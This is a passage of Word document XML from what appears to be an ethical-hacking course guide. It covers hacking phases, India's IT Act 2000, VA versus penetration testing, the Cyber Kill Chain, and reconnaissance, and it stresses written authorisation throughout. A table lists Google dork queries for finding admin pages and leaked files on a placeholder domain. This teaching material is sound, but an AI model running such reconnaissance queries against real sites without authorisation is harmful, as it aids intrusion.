        <w:t xml:space="preserve">possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a lab-safe way and then removes any artefacts created — real persistence is never left on a client's live system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Covering Tracks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> erases evidence, as seen in the 2014 Sony Pictures hack's wiping malware. An authorised tester only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">describes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> this phase in the report; actually destroying client logs or evidence would itself be harmful and is never performed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Discuss the legal framework governing ethical hacking in India under the IT Act, 2000, and explain why written authorisation is the single most important safeguard for a penetration tester.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The IT Act, 2000 criminalises various forms of unauthorised computer access: Section 43 creates civil liability for unauthorised access or damage; Section 65 covers tampering with required source code or logs; Section 66 turns Section 43 acts into crimes when done dishonestly or fraudulently; Section 66B covers receiving stolen computer resources; Section 66C covers identity theft; and Section 66F covers cyber terrorism against critical infrastructure, carrying life imprisonment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">None of these sections carve out an exception for good intentions. The law distinguishes legal from illegal access purely on the basis of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">authorisation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Written authorisation is therefore the tester's only real legal protection — without it, performing exactly the same technical actions that would otherwise be a professional service becomes a prosecutable offence under Sections 43/66 at minimum, with harsher charges possible depending on what is accessed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is why professional engagements never begin with a scan; they begin with a signed authorisation letter, a Rules of Engagement document defining exactly what is permitted, an NDA protecting the client's confidential data, and a precise scope defining which systems may be touched.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compare Vulnerability Assessment, Penetration Testing and VAPT, and explain how the Cyber Kill Chain and the 5 Phases of Ethical Hacking relate to each other.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A Vulnerability Assessment uses automated scanning for broad coverage, producing a list of potential weaknesses (often as CVEs with CVSS scores) without exploiting them. A Penetration Test is manual, targeted and deep, actively exploiting selected weaknesses to prove real business impact through a proof of concept. VAPT combines both approaches — broad automated coverage plus deep manual validation of the most important findings — and is the standard commercial offering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The 5 Phases of Ethical Hacking (Reconnaissance, Scanning &amp; Enumeration, Gaining Access, Maintaining Access, Covering Tracks) describe an engagement from the tester's or attacker's point of view, step by step. The Cyber Kill Chain's seven stages (Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command &amp; Control, Actions on Objectives) describe the same overall intrusion lifecycle but from a defensive, detection-oriented point of view, and break the middle phases into finer detail (for instance separating the act of weaponizing an exploit from actually delivering it). The two models map closely onto each other — Reconnaissance to Reconnaissance, Gaining Access spans Delivery through Installation, and Maintaining Access matches Command &amp; Control — but the Kill Chain's finer breakdown gives defenders more distinct points at which to detect or interrupt an attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit II — Reconnaissance, Scanning &amp; Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This unit covers the intelligence-gathering side of a penetration test: finding information about a target without touching it (passive), then probing it directly (active), then turning raw findings into a prioritised, defensible list of risks using CVSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Passive vs Active Reconnaissance</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1949"/>
        <w:gridCol w:w="3898"/>
        <w:gridCol w:w="3899"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Passive Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3899"/>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Active Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Gathering information </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">without directly contacting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> the target's systems — no packet reaches the target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3899"/>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Directly interacting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> with target systems — packets are sent and can be logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Detectability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Invisible to the target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3899"/>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Can be logged, alerted on, or blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Google Dorking, WHOIS, DNS lookups, Shodan, theHarvester, LinkedIn OSINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="389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Nmap scanning, banner grabbing, enumeration (SMB/SNMP/SMTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Legal risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Very low — uses only public sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3899"/>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Must be strictly within authorised scope and testing window</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Google Dorking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition and how it works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Google Dorking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means using advanced search operators to find information that search engines have indexed but which is not meant to be easily found — exposed files, admin pages, or error messages.</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1754"/>
        <w:gridCol w:w="4288"/>
        <w:gridCol w:w="3704"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>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Operator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4288"/>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What It Does</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3704"/>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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">site:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4288"/>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Restricts results to one domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3704"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">site:target.com inurl:login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">filetype:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4288"/>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Searches for a specific file extension — often surfaces leaked configs or reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3704"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">site:target.com filetype:xlsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">intitle:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4288"/>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Finds pages whose title contains a term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3704"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">intitle:"index of" "parent directory"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">inurl:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4288"/>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Filters by keywords in the URL — useful for finding login or admin pages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3704"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">inurl:admin site:target.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">cache:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4288"/>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Shows Google's stored snapshot of a page — may reveal removed content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3704"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">cache:target.com/old-page.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:left w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ Current availability note</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Google has reduced the reliability of some older operators over time, and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">cache:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> in particular has become much less consistent and may return little or no result on modern Google. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">site:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
